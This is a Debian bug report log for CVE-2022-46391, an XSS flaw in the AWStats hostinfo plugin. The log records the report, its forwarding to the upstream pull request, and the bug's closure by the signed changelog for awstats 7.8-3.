Debian Bug report logs -
#1025410
awstats: CVE-2022-46391: XSS due to printing response from Net::XWhois without proper checks
Reply or subscribe to this bug.
Toggle useless messages
Report forwarded
to debian-bugs-dist@lists.debian.org, carnil@debian.org, team@security.debian.org, Debian QA Group <packages@qa.debian.org>:
Bug#1025410; Package src:awstats.
(Sun, 04 Dec 2022 09:33:04 GMT) (full text, mbox, link).
Acknowledgement sent
to Salvatore Bonaccorso <carnil@debian.org>:
New Bug report received and forwarded. Copy sent to carnil@debian.org, team@security.debian.org, Debian QA Group <packages@qa.debian.org>.
(Sun, 04 Dec 2022 09:33:04 GMT) (full text, mbox, link).
Message #5 received at submit@bugs.debian.org (full text, mbox, reply):
Source: awstats
Version: 7.8-2
Severity: important
Tags: security upstream
Forwarded: https://github.com/eldy/AWStats/pull/226
X-Debbugs-Cc: carnil@debian.org, Debian Security Team <team@security.debian.org>
Hi,
The following vulnerability was published for awstats.
CVE-2022-46391[0]:
| AWStats 7.x through 7.8 allows XSS in the hostinfo plugin due to
| printing a response from Net::XWhois without proper checks.
If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
For further information see:
[0] https://security-tracker.debian.org/tracker/CVE-2022-46391
https://www.cve.org/CVERecord?id=CVE-2022-46391
[1] https://github.com/eldy/AWStats/pull/226
Regards,
Salvatore
Reply sent
to Salvatore Bonaccorso <carnil@debian.org>:
You have taken responsibility.
(Sun, 04 Dec 2022 20:39:03 GMT) (full text, mbox, link).
Notification sent
to Salvatore Bonaccorso <carnil@debian.org>:
Bug acknowledged by developer.
(Sun, 04 Dec 2022 20:39:04 GMT) (full text, mbox, link).
Message #10 received at 1025410-close@bugs.debian.org (full text, mbox, reply):
Source: awstats
Source-Version: 7.8-3
Done: Salvatore Bonaccorso <carnil@debian.org>
We believe that the bug you reported is fixed in the latest version of
awstats, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 1025410@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Salvatore Bonaccorso <carnil@debian.org> (supplier of updated awstats package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Format: 1.8
Date: Sun, 04 Dec 2022 20:52:31 +0100
Source: awstats
Architecture: source
Version: 7.8-3
Distribution: unstable
Urgency: medium
Maintainer: Debian QA Group <packages@qa.debian.org>
Changed-By: Salvatore Bonaccorso <carnil@debian.org>
Closes: 1025410
Changes:
awstats (7.8-3) unstable; urgency=medium
.
* QA upload.
.
[ Debian Janitor ]
* Bump debhelper from old 12 to 13.
* Avoid invoking dpkg-parsechangelog.
.
[ Salvatore Bonaccorso ]
* fix cross site scripting (CVE-2022-46391) (Closes: #1025410)
Checksums-Sha1:
fd1cb62ef07e8c0d449641ee85dfe6dadf7bb945 1989 awstats_7.8-3.dsc
0bce1381e702ed768a7512be365e763b6ca86319 37740 awstats_7.8-3.debian.tar.xz
Checksums-Sha256:
6c4714b2fe86c072114bcd582586dc8b7089360c0d6a93d9eae7c779415d46f1 1989 awstats_7.8-3.dsc
ebeeabfa6bca4834262751d9ff4794c5f93cb0f24aea1b851f6fed89f8c44017 37740 awstats_7.8-3.debian.tar.xz
Files:
bddd612233834eceb06e0db1ac21cb23 1989 web optional awstats_7.8-3.dsc
e419440cea2cc21f9c0309cfee6d9560 37740 web optional awstats_7.8-3.debian.tar.xz
-----BEGIN PGP SIGNATURE-----
iQKmBAEBCgCQFiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmOM/MVfFIAAAAAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQSHGNhcm5pbEBk
ZWJpYW4ub3JnAAoJEAVMuPMTQ89EHeUP/34rf3ihPSqqSQfWyovHr0KKVOs5SBLF
wjWYJ/gY2hRzb+Po4NCYjYE6ND2+d72Q+r7B4u6yE6/O8N6uP6w+OJDkHTWiFedO
dOFhlrV8oEo0cH/OehTiru8fh85fbhwb/001kZ/dNsurqJh98xeJV18gpVGI+0Pc
h4v7ciGgk/SD51RMVHAErggPnMwWO112cnNhqXWYYGg3s3uKMVUEaNUh47aiySqR
HuoIJq28Djn52YwTI+TQIhmgzftRJdEU+c6NDWswz6u9DIbpVDahG7F/jMeeNu4w
H3JoXLd2FJJgCbsJZVx2LNeib2E1f3zQRdVxdxcGkKHhy20w27vQJtqv/PUst3uP
rz47PfBSKpOLGDprcpJN04PaWvRtq+Hse+j4exHKDhBuB1x159qRTG43/A49cWvc
FBPzMmQMuy+ZMZn+VrnPFXkaRyEdmM8iI6STUTXqkKyXLM/p5tP5HEHEgClF+wJw
xL1/ecfyEYSz8eYK6pDTDpjpi7dtvv7a9q+2rNNmFry6fN9D5gEt+I0k8hCDhitL
8gGOc3+8SovUIkYbBYsxMvxSG3xwxqHrF7PMqF5Zqd2sJp2/cMJ+oSpUY4tzzH7N
bqaQ8vTsJ29t2ZZHulZ0/M7OAwDKgcmR3kHi8m71etCvRHbs3X3S9eRypEJlpwOd
wFlmjmMeuhij
=E4yc
-----END PGP SIGNATURE-----
Send a report that this bug log contains spam.
Debian bug tracking system administrator <owner@bugs.debian.org>.
Last modified:
Mon Dec 5 07:18:15 2022;
Machine Name:
buxtehude
Debian Bug tracking system
Debbugs is free software and licensed under the terms of the GNU
Public License version 2. The current version can be obtained
from https://bugs.debian.org/debbugs-source/.
Copyright © 1999 Darren O. Benham,
1997,2003 nCipher Corporation Ltd,
1994-97 Ian Jackson,
2005-2017 Don Armstrong, and many other contributors.
Vulmon